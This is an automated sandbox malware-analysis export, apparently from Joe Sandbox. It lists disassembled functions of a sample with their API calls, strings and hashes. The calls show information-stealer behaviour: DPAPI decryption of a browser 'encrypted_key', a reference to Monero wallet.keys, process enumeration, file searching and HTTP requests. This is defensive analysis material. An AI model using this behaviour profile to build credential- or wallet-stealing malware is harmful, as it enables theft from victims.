Part of subcall function 000F9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,000F4EEE,00000000,?), ref: 000F9B01
Part of subcall function 000F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000F4EEE,00000000,00000000), ref: 000F9B2A
Part of subcall function 000F9AC0: LocalFree.KERNEL32(?,?,?,?,000F4EEE,00000000,?), ref: 000F9B3F

Part of subcall function 000F9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000F9B84
Part of subcall function 000F9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 000F9BA3
Part of subcall function 000F9B60: LocalFree.KERNEL32(?), ref: 000F9BD3

Strings

, xrefs: 000F9DC1
DPAPI, xrefs: 000F9D89
"encrypted_key":", xrefs: 000F9D30

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 25f88ee0ad54f56c7d6fa5801f1d8e50cc08d32c6c21b024d52a0b41a98dd8df
Instruction ID: f9596f20c65aee6425fba13a5b18fa7f21f71154d3d86ddbb94afb592d41df0a
Opcode Fuzzy Hash: 25f88ee0ad54f56c7d6fa5801f1d8e50cc08d32c6c21b024d52a0b41a98dd8df
Instruction Fuzzy Hash: 3E3143B5D1020DABCF04EBE4DC85FFEB7B8AF48304F244519EA05A7241E7749A04CBA1

Function 00108680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001105B7), ref: 001086CA
Process32First.KERNEL32(?,00000128), ref: 001086DE
Process32Next.KERNEL32(?,00000128), ref: 001086F3

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

CloseHandle.KERNEL32(?), ref: 00108761

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 03d2791465c0b061fc7f487ba5ebb25a75bc9966d5fe1ba608d53645fa633f0a
Instruction ID: 40f962725dcd7b4d2696258cbffb486cba9356e9a7e3099d4ee8e63d8bfe7edb
Opcode Fuzzy Hash: 03d2791465c0b061fc7f487ba5ebb25a75bc9966d5fe1ba608d53645fa633f0a
Instruction Fuzzy Hash: C5317C71901218ABCB25DF90CC95FEEB778EF55700F5081A9F14AA61E0DFB06A85CFA1

Function 00106AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CD8E60,?,0011110C,?,00000000,?,00111110,?,00000000,00110AEF), ref: 00106ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00106AE8
CloseHandle.KERNEL32(00000000), ref: 00106AF9
Sleep.KERNEL32(00001770), ref: 00106B04
CloseHandle.KERNEL32(?,00000000,?,00CD8E60,?,0011110C,?,00000000,?,00111110,?,00000000,00110AEF), ref: 00106B1A
ExitProcess.KERNEL32 ref: 00106B22

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 3d0d9369020ee84efa49bba8000bc1e3d3e229638f8c45bea769b5baa6c5c097
Instruction ID: c49fbccd874a4cab4e6406da9a3700df9ac8beb0cb92db922a676df9fafb7759
Opcode Fuzzy Hash: 3d0d9369020ee84efa49bba8000bc1e3d3e229638f8c45bea769b5baa6c5c097
Instruction Fuzzy Hash: DFF05870B4030AEFE700BBA0DC8ABBE7B38EF14701F104A14B593A61D1CBF05540DAA6

Function 000F47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000F4839
InternetCrackUrlA.WININET(00000000,00000000), ref: 000F4849

Strings

<, xrefs: 000F47C9

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 1d0aa6fe01f5d45bc01ceecf2eb7e92415773fe658aec356144aa34238736fb2
Instruction ID: 0b0ff6765f451e09f85b6056c2613593816efd41518950dde89a0583305fe8b8
Opcode Fuzzy Hash: 1d0aa6fe01f5d45bc01ceecf2eb7e92415773fe658aec356144aa34238736fb2
Instruction Fuzzy Hash: 7F213EB1D00208ABDF14DFA4E845ADD7B78FF44320F108625F965A72D1DB706A05CB92

Function 001051F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 000F6280: InternetOpenA.WININET(00110DFE,00000001,00000000,00000000,00000000), ref: 000F62E1
Part of subcall function 000F6280: StrCmpCA.SHLWAPI(?,00CDE928), ref: 000F6303
Part of subcall function 000F6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000F6335
Part of subcall function 000F6280: HttpOpenRequestA.WININET(00000000,GET,?,00CDDFC8,00000000,00000000,00400100,00000000), ref: 000F6385
Part of subcall function 000F6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000F63BF
Part of subcall function 000F6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000F63D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00105228

Strings

ERROR, xrefs: 00105273
ERROR, xrefs: 0010521A

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 359cf15afde255f54b0598929156013077bef1dcafc14fa67351d7f2587f5889
Instruction ID: 4d8e1c1771b6ff6f855fd1ac29bad16a6de38626bd02babfb5ea966e7397f1c0
Opcode Fuzzy Hash: 359cf15afde255f54b0598929156013077bef1dcafc14fa67351d7f2587f5889
Instruction Fuzzy Hash: 9F11FE30910648EBDB18FF64DD52EED7739AF60300F808168F95A5B5D2EFB1AB05CA91

Function 00104F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00108DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00108E0B

lstrcat.KERNEL32(?,00000000), ref: 00104F7A
lstrcat.KERNEL32(?,00111070), ref: 00104F97
lstrcat.KERNEL32(?,00CD9190), ref: 00104FAB
lstrcat.KERNEL32(?,00111074), ref: 00104FBD

Part of subcall function 00104910: wsprintfA.USER32 ref: 0010492C
Part of subcall function 00104910: FindFirstFileA.KERNEL32(?,?), ref: 00104943

Part of subcall function 00104910: StrCmpCA.SHLWAPI(?,00110FDC), ref: 00104971
Part of subcall function 00104910: StrCmpCA.SHLWAPI(?,00110FE0), ref: 00104987
Part of subcall function 00104910: FindNextFileA.KERNEL32(000000FF,?), ref: 00104B7D
Part of subcall function 00104910: FindClose.KERNEL32(000000FF), ref: 00104B92

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: a2fbea970b53ec72a3bc115ccec024b19a55bccefe72b6b9b5724c5ea2d2f11e
Instruction ID: d9315233f12699d142dee557321486195a80cea8a3f83f99ba81838d204d5c66
Opcode Fuzzy Hash: a2fbea970b53ec72a3bc115ccec024b19a55bccefe72b6b9b5724c5ea2d2f11e
Instruction Fuzzy Hash: 4221CB76900608E7C755F770EC86EE9333CAB58700F404558B6C9571C1EFB596C88B92

Function 00100740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00CD90D0), ref: 0010079A
StrCmpCA.SHLWAPI(00000000,00CD91E0), ref: 00100866
StrCmpCA.SHLWAPI(00000000,00CD9160), ref: 0010099D

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 8da1defc4de33ae0b6c77883604dfe979726012d805dd458c1ea0574537411b1
Instruction ID: 43ffe458390310c2f3ae11f2ee4f898525f5c759af978c1a04cf6c94c82c29f8
Opcode Fuzzy Hash: 8da1defc4de33ae0b6c77883604dfe979726012d805dd458c1ea0574537411b1
Instruction Fuzzy Hash: AC916775B10208DFCB28EF64D995BEDB7B9BF94300F40C519E84A9F281DB719A05CB92

Function 00100765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00CD90D0), ref: 0010079A
StrCmpCA.SHLWAPI(00000000,00CD91E0), ref: 00100866
StrCmpCA.SHLWAPI(00000000,00CD9160), ref: 0010099D

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
